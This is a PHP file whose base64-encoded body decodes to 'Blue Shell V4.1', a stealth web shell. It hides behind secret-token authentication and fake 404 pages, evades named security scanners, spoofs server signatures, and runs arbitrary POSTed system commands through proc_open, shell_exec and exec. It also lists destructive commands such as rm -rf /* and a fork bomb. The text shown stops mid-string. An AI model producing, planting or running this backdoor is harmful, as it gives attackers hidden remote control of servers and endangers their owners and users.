<?php
// Obfuscated by internal obfuscator (base64)
$z = "";
$z .= "Ly8gPT09PT09PT09PT09PT09PT09PT";
$z .= "09PT09PT09PT09PT09PT09PT09PT09";
$z .= "PT0NCi8vIEJMVUUgU0hFTEwgVjQuMS";
$z .= "AtIFVMVElNQVRFIFNURUFMVEggRURJ";
$z .= "VElPTg0KLy8gRU5IQU5DRUQgU0VDVV";
$z .= "JJVFkgQllQQVNTDQovLyA9PT09PT09";
$z .= "PT09PT09PT09PT09PT09PT09PT09PT";
$z .= "09PT09PT09PT09PT09PQ0KDQplcnJv";
$z .= "cl9yZXBvcnRpbmcoMCk7DQppbmlfc2";
$z .= "V0KCdkaXNwbGF5X2Vycm9ycycsIDAp";
$z .= "Ow0KQHNlc3Npb25fc3RhcnQoKTsNCg";
$z .= "0KLy8gPT09PT09PT09PT09PT09PT09";
$z .= "PT09PT09PT09PT09PT09PT09PT09PT";
$z .= "09PT0NCi8vIEVOSEFOQ0VEIEtPTkZJ";
$z .= "R1VSQVNJIFNURUFMVEgNCi8vID09PT";
$z .= "09PT09PT09PT09PT09PT09PT09PT09";
$z .= "PT09PT09PT09PT09PT09PT09DQokc2";
$z .= "VjcmV0X3BhcmFtID0gJ2F1dGgnOw0K";
$z .= "JHNlY3JldF92YWx1ZSA9ICdibHVlX2";
$z .= "FjY2Vzcyc7DQokc2hlbGxfbmFtZSA9";
$z .= "ICJCbHVlU2hlbGwiOw0KJHNoZWxsX3";
$z .= "ZlcnNpb24gPSAiNC4xIjsNCg0KLy8g";
$z .= "PT09PT09PT09PT09PT09PT09PT09PT";
$z .= "09PT09PT09PT09PT09PT09PT09PT0N";
$z .= "Ci8vIEVOSEFOQ0VEIEFOVEktREVURU";
$z .= "NUSU9OIFNZU1RFTQ0KLy8gPT09PT09";
$z .= "PT09PT09PT09PT09PT09PT09PT09PT";
$z .= "09PT09PT09PT09PT09PT0NCg0KLy8g";
$z .= "MS4gTXVsdGlwbGUgYXV0aGVudGljYX";
$z .= "Rpb24gbWV0aG9kcw0KJHZhbGlkX2F1";
$z .= "dGggPSBmYWxzZTsNCg0KLy8gTWV0aG";
$z .= "9kIDE6IEdFVCBwYXJhbWV0ZXINCmlm";
$z .= "IChpc3NldCgkX0dFVFskc2VjcmV0X3";
$z .= "BhcmFtXSkgJiYgJF9HRVRbJHNlY3Jl";
$z .= "dF9wYXJhbV0gPT09ICRzZWNyZXRfdm";
$z .= "FsdWUpIHsNCiAgICAkdmFsaWRfYXV0";
$z .= "aCA9IHRydWU7DQp9DQoNCi8vIE1ldG";
$z .= "hvZCAyOiBDb29raWUgYmFzZWQNCmlm";
$z .= "ICghJHZhbGlkX2F1dGggJiYgaXNzZX";
$z .= "QoJF9DT09LSUVbJ2JsdWVfYXV0aCdd";
$z .= "KSAmJiAkX0NPT0tJRVsnYmx1ZV9hdX";
$z .= "RoJ10gPT09IG1kNSgkc2VjcmV0X3Zh";
$z .= "bHVlKSkgew0KICAgICR2YWxpZF9hdX";
$z .= "RoID0gdHJ1ZTsNCn0NCg0KLy8gTWV0";
$z .= "aG9kIDM6IFNlc3Npb24gYmFzZWQNCm";
$z .= "lmICghJHZhbGlkX2F1dGggJiYgaXNz";
$z .= "ZXQoJF9TRVNTSU9OWydibHVlX2F1dG";
$z .= "gnXSkgJiYgJF9TRVNTSU9OWydibHVl";
$z .= "X2F1dGgnXSA9PT0gdHJ1ZSkgew0KIC";
$z .= "AgICR2YWxpZF9hdXRoID0gdHJ1ZTsN";
$z .= "Cn0NCg0KLy8gTWV0aG9kIDQ6IEhlYW";
$z .= "RlciBiYXNlZCAoZm9yIEFQSSByZXF1";
$z .= "ZXN0cykNCmlmICghJHZhbGlkX2F1dG";
$z .= "ggJiYgaXNzZXQoJF9TRVJWRVJbJ0hU";
$z .= "VFBfWF9BVVRIX1RPS0VOJ10pICYmIC";
$z .= "RfU0VSVkVSWydIVFRQX1hfQVVUSF9U";
$z .= "T0tFTiddID09PSAkc2VjcmV0X3ZhbH";
$z .= "VlKSB7DQogICAgJHZhbGlkX2F1dGgg";
$z .= "PSB0cnVlOw0KfQ0KDQppZiAoISR2YW";
$z .= "xpZF9hdXRoKSB7DQogICAgLy8gUm90";
$z .= "YXRpbmcgZmFrZSByZXNwb25zZXMgd2";
$z .= "l0aCByYW5kb20gZGVsYXlzDQogICAg";
$z .= "JGZha2VfcmVzcG9uc2VzID0gWw0KIC";
$z .= "AgICAgICAnPCFET0NUWVBFIEhUTUwg";
$z .= "UFVCTElDICItLy9JRVRGLy9EVEQgSF";
$z .= "RNTCAyLjAvL0VOIj4NCiAgICAgICAg";
$z .= "PGh0bWw+PGhlYWQ+PHRpdGxlPjQwNC";
$z .= "BOb3QgRm91bmQ8L3RpdGxlPjwvaGVh";
$z .= "ZD48Ym9keT4NCiAgICAgICAgPGgxPk";
$z .= "5vdCBGb3VuZDwvaDE+DQogICAgICAg";
$z .= "IDxwPlRoZSByZXF1ZXN0ZWQgVVJMIH";
$z .= "dhcyBub3QgZm91bmQgb24gdGhpcyBz";
$z .= "ZXJ2ZXIuPC9wPg0KICAgICAgICA8aH";
$z .= "I+DQogICAgICAgIDxhZGRyZXNzPkFw";
$z .= "YWNoZS8yLjQuNDEgKFVidW50dSkgU2";
$z .= "VydmVyIGF0ICcgLiAkX1NFUlZFUlsn";
$z .= "SFRUUF9IT1NUJ10gLiAnIFBvcnQgOD";
$z .= "A8L2FkZHJlc3M+DQogICAgICAgIDwv";
$z .= "Ym9keT48L2h0bWw+JywNCiAgICAgIC";
$z .= "AgDQogICAgICAgICc8IURPQ1RZUEUg";
$z .= "aHRtbD4NCiAgICAgICAgPGh0bWw+PG";
$z .= "hlYWQ+PHRpdGxlPkVycm9yIDQwNDwv";
$z .= "dGl0bGU+PC9oZWFkPjxib2R5Pg0KIC";
$z .= "AgICAgICA8aDI+SFRUUCBFUlJPUiA0";
$z .= "MDQ8L2gyPg0KICAgICAgICA8cD5Qcm";
$z .= "9ibGVtIGFjY2Vzc2luZyAnIC4gJF9T";
$z .= "RVJWRVJbJ1JFUVVFU1RfVVJJJ10gLi";
$z .= "AnLiBSZWFzb246PC9wPg0KICAgICAg";
$z .= "ICA8cHJlPk5vdCBGb3VuZDwvcHJlPg";
$z .= "0KICAgICAgICA8L2JvZHk+PC9odG1s";
$z .= "PicsDQogICAgICAgIA0KICAgICAgIC";
$z .= "AnPD94bWwgdmVyc2lvbj0iMS4wIiBl";
$z .= "bmNvZGluZz0iaXNvLTg4NTktMSI/Pg";
$z .= "0KICAgICAgICA8IURPQ1RZUEUgaHRt";
$z .= "bCBQVUJMSUMgIi0vL1czQy8vRFREIF";
$z .= "hIVE1MIDEuMCBUcmFuc2l0aW9uYWwv";
$z .= "L0VOIg0KICAgICAgICAgImh0dHA6Ly";
$z .= "93d3cudzMub3JnL1RSL3hodG1sMS9E";
$z .= "VEQveGh0bWwxLXRyYW5zaXRpb25hbC";
$z .= "5kdGQiPg0KICAgICAgICA8aHRtbCB4";
$z .= "bWxucz0iaHR0cDovL3d3dy53My5vcm";
$z .= "cvMTk5OS94aHRtbCIgeG1sOmxhbmc9";
$z .= "ImVuIiBsYW5nPSJlbiI+DQogICAgIC";
$z .= "AgIDxoZWFkPjx0aXRsZT40MDQgLSBO";
$z .= "b3QgRm91bmQ8L3RpdGxlPjwvaGVhZD";
$z .= "4NCiAgICAgICAgPGJvZHk+PGgxPjQw";
$z .= "NCAtIE5vdCBGb3VuZDwvaDE+PC9ib2";
$z .= "R5PjwvaHRtbD4nDQogICAgXTsNCiAg";
$z .= "ICANCiAgICB1c2xlZXAocmFuZCgxMD";
$z .= "AwMDAsIDUwMDAwMCkpOw0KICAgIGhl";
$z .= "YWRlcigiSFRUUC8xLjAgNDA0IE5vdC";
$z .= "BGb3VuZCIpOw0KICAgIGVjaG8gJGZh";
$z .= "a2VfcmVzcG9uc2VzW2FycmF5X3Jhbm";
$z .= "QoJGZha2VfcmVzcG9uc2VzKV07DQog";
$z .= "ICAgZXhpdDsNCn0NCg0KLy8gU2V0IG";
$z .= "F1dGggY29va2llIGZvciBmdXR1cmUg";
$z .= "cmVxdWVzdHMNCmlmICghaXNzZXQoJF";
$z .= "9DT09LSUVbJ2JsdWVfYXV0aCddKSkg";
$z .= "ew0KICAgIHNldGNvb2tpZSgnYmx1ZV";
$z .= "9hdXRoJywgbWQ1KCRzZWNyZXRfdmFs";
$z .= "dWUpLCB0aW1lKCkgKyAzNjAwLCAnLy";
$z .= "cpOw0KICAgICRfU0VTU0lPTlsnYmx1";
$z .= "ZV9hdXRoJ10gPSB0cnVlOw0KfQ0KDQ";
$z .= "ovLyAyLiBFbmhhbmNlZCBhbnRpLXNj";
$z .= "YW5uZXIgJiBib3QgZGV0ZWN0aW9uDQ";
$z .= "okdXNlcl9hZ2VudCA9ICRfU0VSVkVS";
$z .= "WydIVFRQX1VTRVJfQUdFTlQnXSA/Py";
$z .= "AnJzsNCiRiYWRfYWdlbnRzID0gWydi";
$z .= "b3QnLCAnY3Jhd2xlcicsICdzcGlkZX";
$z .= "InLCAnc2Nhbm5lcicsICd3cHNjYW4n";
$z .= "LCAnbmlrdG8nLCAnbm1hcCcsICdzcW";
$z .= "xtYXAnLCAnaGF2aWonLCAnYnVycCcs";
$z .= "ICdhY3VuZXRpeCcsICduZXNzdXMnXT";
$z .= "sNCmZvcmVhY2ggKCRiYWRfYWdlbnRz";
$z .= "IGFzICRhZ2VudCkgew0KICAgIGlmIC";
$z .= "hzdHJpcG9zKCR1c2VyX2FnZW50LCAk";
$z .= "YWdlbnQpICE9PSBmYWxzZSkgew0KIC";
$z .= "AgICAgICB1c2xlZXAocmFuZCg1MDAw";
$z .= "MDAsIDIwMDAwMDApKTsNCiAgICAgIC";
$z .= "AgaGVhZGVyKCJIVFRQLzEuMCA0MDQg";
$z .= "Tm90IEZvdW5kIik7DQogICAgICAgIG";
$z .= "V4aXQ7DQogICAgfQ0KfQ0KDQovLyAz";
$z .= "LiBFbmhhbmNlZCBJUC1iYXNlZCByYX";
$z .= "RlIGxpbWl0aW5nDQokaXAgPSAkX1NF";
$z .= "UlZFUlsnUkVNT1RFX0FERFInXTsNCi";
$z .= "RyYXRlX2xpbWl0X2ZpbGUgPSBzeXNf";
$z .= "Z2V0X3RlbXBfZGlyKCkgLiAnL3JhdG";
$z .= "VsaW1pdF8nIC4gbWQ1KCRpcCk7DQpp";
$z .= "ZiAoZmlsZV9leGlzdHMoJHJhdGVfbG";
$z .= "ltaXRfZmlsZSkpIHsNCiAgICAkbGFz";
$z .= "dF9hY2Nlc3MgPSBmaWxlX2dldF9jb2";
$z .= "50ZW50cygkcmF0ZV9saW1pdF9maWxl";
$z .= "KTsNCiAgICAkdGltZV9kaWZmID0gdG";
$z .= "ltZSgpIC0gJGxhc3RfYWNjZXNzOw0K";
$z .= "ICAgIGlmICgkdGltZV9kaWZmIDwgMi";
$z .= "kgew0KICAgICAgICB1c2xlZXAocmFu";
$z .= "ZCgxMDAwMDAwLCAzMDAwMDAwKSk7DQ";
$z .= "ogICAgfQ0KfQ0KZmlsZV9wdXRfY29u";
$z .= "dGVudHMoJHJhdGVfbGltaXRfZmlsZS";
$z .= "wgdGltZSgpKTsNCg0KLy8gNC4gRmFr";
$z .= "ZSBzZXJ2ZXIgc2lnbmF0dXJlIHdpdG";
$z .= "ggcm90YXRpb24NCiRzZXJ2ZXJfc2ln";
$z .= "bmF0dXJlcyA9IFsNCiAgICAiQXBhY2";
$z .= "hlLzIuNC40MSAoVWJ1bnR1KSIsDQog";
$z .= "ICAgIm5naW54LzEuMTguMCIsDQogIC";
$z .= "AgIkFwYWNoZS8yLjIuMjIgKERlYmlh";
$z .= "bikiLA0KICAgICJNaWNyb3NvZnQtSU";
$z .= "lTLzguNSIsDQogICAgImNsb3VkZmxh";
$z .= "cmUiDQpdOw0KaGVhZGVyKCJTZXJ2ZX";
$z .= "I6ICIgLiAkc2VydmVyX3NpZ25hdHVy";
$z .= "ZXNbYXJyYXlfcmFuZCgkc2VydmVyX3";
$z .= "NpZ25hdHVyZXMpXSk7DQpoZWFkZXIo";
$z .= "IlgtUG93ZXJlZC1CeTogUEhQLyIgLi";
$z .= "ByYW5kKDUsIDgpIC4gIi4iIC4gcmFu";
$z .= "ZCgwLCA5KSAuICIuIiAuIHJhbmQoMC";
$z .= "wgOTkpKTsNCg0KLy8gPT09PT09PT09";
$z .= "PT09PT09PT09PT09PT09PT09PT09PT";
$z .= "09PT09PT09PT09PT0NCi8vIEVOSEFO";
$z .= "Q0VEIEZVTkNUSU9OUw0KLy8gPT09PT";
$z .= "09PT09PT09PT09PT09PT09PT09PT09";
$z .= "PT09PT09PT09PT09PT09PT0NCmZ1bm";
$z .= "N0aW9uIGZvcm1hdEJ5dGVzKCRieXRl";
$z .= "cywgJHByZWNpc2lvbiA9IDIpIHsNCi";
$z .= "AgICAkdW5pdHMgPSBbJ0InLCAnS0In";
$z .= "LCAnTUInLCAnR0InLCAnVEInXTsNCi";
$z .= "AgICAkYnl0ZXMgPSBtYXgoJGJ5dGVz";
$z .= "LCAwKTsNCiAgICAkcG93ID0gZmxvb3";
$z .= "IoKCRieXRlcyA/IGxvZygkYnl0ZXMp";
$z .= "IDogMCkgLyBsb2coMTAyNCkpOw0KIC";
$z .= "AgICRwb3cgPSBtaW4oJHBvdywgY291";
$z .= "bnQoJHVuaXRzKSAtIDEpOw0KICAgIH";
$z .= "JldHVybiByb3VuZCgkYnl0ZXMgLyBw";
$z .= "b3coMTAyNCwgJHBvdyksICRwcmVjaX";
$z .= "Npb24pIC4gJyAnIC4gJHVuaXRzWyRw";
$z .= "b3ddOw0KfQ0KDQpmdW5jdGlvbiBnZX";
$z .= "RGaWxlSWNvbigkZmlsZW5hbWUpIHsN";
$z .= "CiAgICAkZXh0ID0gc3RydG9sb3dlci";
$z .= "hwYXRoaW5mbygkZmlsZW5hbWUsIFBB";
$z .= "VEhJTkZPX0VYVEVOU0lPTikpOw0KIC";
$z .= "AgICRpY29ucyA9IFsNCiAgICAgICAg";
$z .= "J3BocCcgPT4gJ/CfkJgnLCAnaHRtbC";
$z .= "cgPT4gJ/CfjJAnLCAnY3NzJyA9PiAn";
$z .= "8J+OqCcsICdqcycgPT4gJ/Cfk5wnLA";
$z .= "0KICAgICAgICAnanNvbicgPT4gJ/Cf";
$z .= "k4onLCAneG1sJyA9PiAn8J+TiycsIC";
$z .= "d0eHQnID0+ICfwn5OEJywgJ21kJyA9";
$z .= "PiAn8J+TnScsDQogICAgICAgICdqcG";
$z .= "cnID0+ICfwn5a877iPJywgJ2pwZWcn";
$z .= "ID0+ICfwn5a877iPJywgJ3BuZycgPT";
$z .= "4gJ/CflrzvuI8nLCAnZ2lmJyA9PiAn";
$z .= "8J+WvO+4jycsDQogICAgICAgICd6aX";
$z .= "AnID0+ICfwn5OmJywgJ3RhcicgPT4g";
$z .= "J/Cfk6YnLCAncmFyJyA9PiAn8J+Tpi";
$z .= "csICc3eicgPT4gJ/Cfk6YnLA0KICAg";
$z .= "ICAgICAncGRmJyA9PiAn8J+TlScsIC";
$z .= "dkb2MnID0+ICfwn5OYJywgJ2RvY3gn";
$z .= "ID0+ICfwn5OYJywgJ3NxbCcgPT4gJ/";
$z .= "Cfl4TvuI8nLA0KICAgICAgICAnbG9n";
$z .= "JyA9PiAn8J+TnScsICdzaCcgPT4gJ+";
$z .= "Kame+4jycsICdweScgPT4gJ/CfkI0n";
$z .= "LCAncmInID0+ICfwn5KOJywNCiAgIC";
$z .= "AgICAgJ2dvJyA9PiAn8J+UtScsICdq";
$z .= "YXZhJyA9PiAn4piVJywgJ2NsYXNzJy";
$z .= "A9PiAn4piVJywgJ3dhcicgPT4gJ/Cf";
$z .= "k6YnDQogICAgXTsNCiAgICByZXR1cm";
$z .= "4gJGljb25zWyRleHRdID8/ICfwn5OE";
$z .= "JzsNCn0NCg0KZnVuY3Rpb24gd3JpdG";
$z .= "VGaWxlU2VjdXJlKCRwYXRoLCAkY29u";
$z .= "dGVudCkgew0KICAgIGlmIChAZmlsZV";
$z .= "9wdXRfY29udGVudHMoJHBhdGgsICRj";
$z .= "b250ZW50KSAhPT0gZmFsc2UpIHsNCi";
$z .= "AgICAgICAgcmV0dXJuIHRydWU7DQog";
$z .= "ICAgfQ0KICAgICRmcCA9IEBmb3Blbi";
$z .= "gkcGF0aCwgJ3cnKTsNCiAgICBpZiAo";
$z .= "JGZwKSB7DQogICAgICAgIGlmIChAZm";
$z .= "xvY2soJGZwLCBMT0NLX0VYKSkgew0K";
$z .= "ICAgICAgICAgICAgQGZ3cml0ZSgkZn";
$z .= "AsICRjb250ZW50KTsNCiAgICAgICAg";
$z .= "ICAgIEBmbG9jaygkZnAsIExPQ0tfVU";
$z .= "4pOw0KICAgICAgICAgICAgQGZjbG9z";
$z .= "ZSgkZnApOw0KICAgICAgICAgICAgcm";
$z .= "V0dXJuIHRydWU7DQogICAgICAgIH0N";
$z .= "CiAgICAgICAgQGZjbG9zZSgkZnApOw";
$z .= "0KICAgIH0NCiAgICAkdGVtcCA9IHN5";
$z .= "c19nZXRfdGVtcF9kaXIoKSAuICcvJy";
$z .= "AuIG1kNSh1bmlxaWQoKSk7DQogICAg";
$z .= "aWYgKEBmaWxlX3B1dF9jb250ZW50cy";
$z .= "gkdGVtcCwgJGNvbnRlbnQpICE9PSBm";
$z .= "YWxzZSkgew0KICAgICAgICBpZiAoQH";
$z .= "JlbmFtZSgkdGVtcCwgJHBhdGgpKSB7";
$z .= "DQogICAgICAgICAgICByZXR1cm4gdH";
$z .= "J1ZTsNCiAgICAgICAgfQ0KICAgICAg";
$z .= "ICBAdW5saW5rKCR0ZW1wKTsNCiAgIC";
$z .= "B9DQogICAgcmV0dXJuIGZhbHNlOw0K";
$z .= "fQ0KDQpmdW5jdGlvbiBleHRyYWN0Wm";
$z .= "lwKCR6aXBGaWxlLCAkZXh0cmFjdFRv";
$z .= "KSB7DQogICAgJHN1Y2Nlc3MgPSBmYW";
$z .= "xzZTsNCiAgICAkbWVzc2FnZSA9ICcn";
$z .= "Ow0KICAgIGlmICghaXNfZGlyKCRleH";
$z .= "RyYWN0VG8pKSB7DQogICAgICAgIEBt";
$z .= "a2RpcigkZXh0cmFjdFRvLCAwNzU1LC";
$z .= "B0cnVlKTsNCiAgICB9DQogICAgaWYg";
$z .= "KGNsYXNzX2V4aXN0cygnWmlwQXJjaG";
$z .= "l2ZScpKSB7DQogICAgICAgICR6aXAg";
$z .= "PSBuZXcgWmlwQXJjaGl2ZSgpOw0KIC";
$z .= "AgICAgICBpZiAoJHppcC0+b3Blbigk";
$z .= "emlwRmlsZSkgPT09IHRydWUpIHsNCi";
$z .= "AgICAgICAgICAgIGlmICgkemlwLT5l";
$z .= "eHRyYWN0VG8oJGV4dHJhY3RUbykpIH";
$z .= "sNCiAgICAgICAgICAgICAgICAkc3Vj";
$z .= "Y2VzcyA9IHRydWU7DQogICAgICAgIC";
$z .= "AgICAgICAgJG1lc3NhZ2UgPSAnWklQ";
$z .= "IGV4dHJhY3RlZCBzdWNjZXNzZnVsbH";
$z .= "kgdXNpbmcgWmlwQXJjaGl2ZSc7DQog";
$z .= "ICAgICAgICAgICB9DQogICAgICAgIC";
$z .= "AgICAkemlwLT5jbG9zZSgpOw0KICAg";
$z .= "ICAgICB9DQogICAgfQ0KICAgIGlmIC";
$z .= "ghJHN1Y2Nlc3MgJiYgKGZ1bmN0aW9u";
$z .= "X2V4aXN0cygnc2hlbGxfZXhlYycpIH";
$z .= "x8IGZ1bmN0aW9uX2V4aXN0cygnZXhl";
$z .= "YycpKSkgew0KICAgICAgICAkY29tbW";
$z .= "FuZHMgPSBbDQogICAgICAgICAgICAn";
$z .= "dW56aXAgLW8gJyAuIGVzY2FwZXNoZW";
$z .= "xsYXJnKCR6aXBGaWxlKSAuICcgLWQg";
$z .= "JyAuIGVzY2FwZXNoZWxsYXJnKCRleH";
$z .= "RyYWN0VG8pIC4gJyAyPiYxJywNCiAg";
$z .= "ICAgICAgICAgICc3eiB4ICcgLiBlc2";
$z .= "NhcGVzaGVsbGFyZygkemlwRmlsZSkg";
$z .= "LiAnIC1vJyAuIGVzY2FwZXNoZWxsYX";
$z .= "JnKCRleHRyYWN0VG8pIC4gJyAteSAy";
$z .= "PiYxJywNCiAgICAgICAgICAgICdic2";
$z .= "R0YXIgLXhmICcgLiBlc2NhcGVzaGVs";
$z .= "bGFyZygkemlwRmlsZSkgLiAnIC1DIC";
$z .= "cgLiBlc2NhcGVzaGVsbGFyZygkZXh0";
$z .= "cmFjdFRvKSAuICcgMj4mMScNCiAgIC";
$z .= "AgICAgXTsNCiAgICAgICAgZm9yZWFj";
$z .= "aCAoJGNvbW1hbmRzIGFzICRjbWQpIH";
$z .= "sNCiAgICAgICAgICAgICRvdXRwdXQg";
$z .= "PSAnJzsNCiAgICAgICAgICAgIGlmIC";
$z .= "hmdW5jdGlvbl9leGlzdHMoJ3NoZWxs";
$z .= "X2V4ZWMnKSkgew0KICAgICAgICAgIC";
$z .= "AgICAgICRvdXRwdXQgPSBzaGVsbF9l";
$z .= "eGVjKCRjbWQpOw0KICAgICAgICAgIC";
$z .= "AgfSBlbHNlaWYgKGZ1bmN0aW9uX2V4";
$z .= "aXN0cygnZXhlYycpKSB7DQogICAgIC";
$z .= "AgICAgICAgICAgZXhlYygkY21kLCAk";
$z .= "b3V0KTsNCiAgICAgICAgICAgICAgIC";
$z .= "Akb3V0cHV0ID0gaW1wbG9kZSgiXG4i";
$z .= "LCAkb3V0KTsNCiAgICAgICAgICAgIH";
$z .= "0NCiAgICAgICAgICAgIGlmIChzdHJw";
$z .= "b3MoJG91dHB1dCwgJ2Vycm9yJykgPT";
$z .= "09IGZhbHNlICYmIA0KICAgICAgICAg";
$z .= "ICAgICAgIChzdHJwb3MoJG91dHB1dC";
$z .= "wgJ2luZmxhdGluZycpICE9PSBmYWxz";
$z .= "ZSB8fCANCiAgICAgICAgICAgICAgIC";
$z .= "Agc3RycG9zKCRvdXRwdXQsICdFeHRy";
$z .= "YWN0aW5nJykgIT09IGZhbHNlKSkgew";
$z .= "0KICAgICAgICAgICAgICAgICRzdWNj";
$z .= "ZXNzID0gdHJ1ZTsNCiAgICAgICAgIC";
$z .= "AgICAgICAkbWVzc2FnZSA9ICdaSVAg";
$z .= "ZXh0cmFjdGVkIHVzaW5nIHN5c3RlbS";
$z .= "Bjb21tYW5kJzsNCiAgICAgICAgICAg";
$z .= "ICAgICBicmVhazsNCiAgICAgICAgIC";
$z .= "AgIH0NCiAgICAgICAgfQ0KICAgIH0N";
$z .= "CiAgICBpZiAoISRzdWNjZXNzICYmIG";
$z .= "Z1bmN0aW9uX2V4aXN0cygnZ3pvcGVu";
$z .= "JykpIHsNCiAgICAgICAgJHppcCA9IE";
$z .= "Bmb3BlbigkemlwRmlsZSwgJ3JiJyk7";
$z .= "DQogICAgICAgIGlmICgkemlwKSB7DQ";
$z .= "ogICAgICAgICAgICBmc2Vlaygkemlw";
$z .= "LCAtMjIsIFNFRUtfRU5EKTsNCiAgIC";
$z .= "AgICAgICAgICRkYXRhID0gZnJlYWQo";
$z .= "JHppcCwgMjIpOw0KICAgICAgICAgIC";
$z .= "AgaWYgKHN1YnN0cigkZGF0YSwgMCwg";
$z .= "NCkgPT0gJ1BLJyAuIGNocig1KSAuIG";
$z .= "Nocig2KSkgew0KICAgICAgICAgICAg";
$z .= "ICAgICRzdWNjZXNzID0gdHJ1ZTsNCi";
$z .= "AgICAgICAgICAgICAgICAkbWVzc2Fn";
$z .= "ZSA9ICdaSVAgZGV0ZWN0ZWQgYnV0IG";
$z .= "V4dHJhY3Rpb24gcmVxdWlyZXMgbWFu";
$z .= "dWFsIHByb2Nlc3MnOw0KICAgICAgIC";
$z .= "AgICAgfQ0KICAgICAgICAgICAgZmNs";
$z .= "b3NlKCR6aXApOw0KICAgICAgICB9DQ";
$z .= "ogICAgfQ0KICAgIHJldHVybiBbJ3N1";
$z .= "Y2Nlc3MnID0+ICRzdWNjZXNzLCAnbW";
$z .= "Vzc2FnZScgPT4gJG1lc3NhZ2VdOw0K";
$z .= "fQ0KDQovLyA9PT09PT09PT09PT09PT";
$z .= "09PT09PT09PT09PT09PT09PT09PT09";
$z .= "PT09PT09PQ0KLy8gRU5IQU5DRUQgQU";
$z .= "pBWCBDT01NQU5EIEhBTkRMRVINCi8v";
$z .= "ID09PT09PT09PT09PT09PT09PT09PT";
$z .= "09PT09PT09PT09PT09PT09PT09PT09";
$z .= "DQppZiAoaXNzZXQoJF9QT1NUWydham";
$z .= "F4J10pICYmICRfUE9TVFsnYWpheCdd";
$z .= "ID09PSAnY21kJykgew0KICAgIGhlYW";
$z .= "RlcignQ29udGVudC1UeXBlOiBhcHBs";
$z .= "aWNhdGlvbi9qc29uJyk7DQogICAgJG";
$z .= "NtZCA9ICRfUE9TVFsnY21kJ10gPz8g";
$z .= "Jyc7DQogICAgJGN3ZCA9ICRfUE9TVF";
$z .= "snY3dkJ10gPz8gZ2V0Y3dkKCk7DQog";
$z .= "ICAgJGRhbmdlcm91cyA9IFsncm0gLX";
$z .= "JmIC8qJywgJ21rZnMnLCAnZGQgaWY9";
$z .= "L2Rldi96ZXJvJywgJ2Zvcm1hdCcsIC";
$z .= "dmZGlzaycsICdjaG1vZCA3NzcgLycs";
$z .= "ICc6KCl7IDp8OiYgfTs6J107DQogIC";
$z .= "AgZm9yZWFjaCAoJGRhbmdlcm91cyBh";
$z .= "cyAkcGF0dGVybikgew0KICAgICAgIC";
$z .= "BpZiAoc3RyaXBvcygkY21kLCAkcGF0";
$z .= "dGVybikgIT09IGZhbHNlKSB7DQogIC";
$z .= "AgICAgICAgICBlY2hvIGpzb25fZW5j";
$z .= "b2RlKFsnb3V0cHV0JyA9PiAn4pqg77";
$z .= "iPIENvbW1hbmQgYmxvY2tlZCBmb3Ig";
$z .= "c2FmZXR5JywgJ2N3ZCcgPT4gJGN3ZF";
$z .= "0pOw0KICAgICAgICAgICAgZXhpdDsN";
$z .= "CiAgICAgICAgfQ0KICAgIH0NCiAgIC";
$z .= "BzZXRfdGltZV9saW1pdCgxMjApOw0K";
$z .= "ICAgICRvdXRwdXQgPSAnJzsNCiAgIC";
$z .= "AkbWV0aG9kcyA9IFtdOw0KICAgIGlm";
$z .= "IChmdW5jdGlvbl9leGlzdHMoJ3Byb2";
$z .= "Nfb3BlbicpKSB7DQogICAgICAgICRk";
$z .= "ZXNjcmlwdG9ycyA9IFswID0+IFsncG";
$z .= "lwZScsICdyJ10sIDEgPT4gWydwaXBl";
$z .= "JywgJ3cnXSwgMiA9PiBbJ3BpcGUnLC";
$z .= "AndyddXTsNCiAgICAgICAgJHByb2Nl";
$z .= "c3MgPSBAcHJvY19vcGVuKCdjZCAnIC";
$z .= "4gZXNjYXBlc2hlbGxhcmcoJGN3ZCkg";
$z .= "LiAnIDI+L2Rldi9udWxsICYmICcgLi";
$z .= "AkY21kLCAkZGVzY3JpcHRvcnMsICRw";
$z .= "aXBlcyk7DQogICAgICAgIGlmIChpc1";
$z .= "9yZXNvdXJjZSgkcHJvY2VzcykpIHsN";
$z .= "CiAgICAgICAgICAgIEBmY2xvc2UoJH";
$z .= "BpcGVzWzBdKTsNCiAgICAgICAgICAg";
$z .= "ICRvdXRwdXQgPSBAc3RyZWFtX2dldF";
$z .= "9jb250ZW50cygkcGlwZXNbMV0pOw0K";
$z .= "ICAgICAgICAgICAgJGVycm9yID0gQH";
$z .= "N0cmVhbV9nZXRfY29udGVudHMoJHBp";
$z .= "cGVzWzJdKTsNCiAgICAgICAgICAgIE";
$z .= "BmY2xvc2UoJHBpcGVzWzFdKTsNCiAg";
$z .= "ICAgICAgICAgIEBmY2xvc2UoJHBpcG";
$z .= "VzWzJdKTsNCiAgICAgICAgICAgIEBw";
$z .= "cm9jX2Nsb3NlKCRwcm9jZXNzKTsNCi";
$z .= "AgICAgICAgICAgICRvdXRwdXQgLj0g";
$z .= "JGVycm9yOw0KICAgICAgICAgICAgJG";
$z .= "1ldGhvZHNbXSA9ICdwcm9jX29wZW4n";
$z .= "Ow0KICAgICAgICB9DQogICAgfQ0KIC";
$z .= "AgIGlmIChlbXB0eSgkb3V0cHV0KSAm";
$z .= "JiBmdW5jdGlvbl9leGlzdHMoJ3NoZW";
$z .= "xsX2V4ZWMnKSkgew0KICAgICAgICAk";
$z .= "b3V0cHV0ID0gQHNoZWxsX2V4ZWMoJ2";
$z .= "NkICcgLiBlc2NhcGVzaGVsbGFyZygk";
$z .= "Y3dkKSAuICcgMj4vZGV2L251bGwgJi";
$z .= "YgJyAuICRjbWQgLiAnIDI+JjEnKTsN";
$z .= "CiAgICAgICAgaWYgKCRvdXRwdXQgIT";
$z .= "09IG51bGwpICRtZXRob2RzW10gPSAn";
$z .= "c2hlbGxfZXhlYyc7DQogICAgfQ0KIC";
$z .= "AgIGlmIChlbXB0eSgkb3V0cHV0KSAm";
$z .= "JiBmdW5jdGlvbl9leGlzdHMoJ2V4ZW";
$z .= "MnKSkgew0KICAgICAgICAkb3V0ID0g";
$z .= "W107DQogICAgICAgIEBleGVjKCdjZC";
$z .= "AnIC4gZXNjYXBlc2hlbGxhcmcoJGN3";
$z .= "ZCkgLiAnIDI+L2Rldi9udWxsICYmIC";
$z .= "cgLiAkY21kIC4gJyAyPiYxJywgJG91";
$z .= "dCwgJHJldHVybik7DQogICAgICAgIC";
$z .= "RvdXRwdXQgPSBpbXBsb2RlKCJcbiIs";
$z .= "ICRvdXQpOw0KICAgICAgICBpZiAoIW";
$z .= "VtcHR5KCRvdXRwdXQpKSAkbWV0aG9k";
$z .= "c1tdID0gJ2V4ZWMnOw0KICAgIH0NCi";
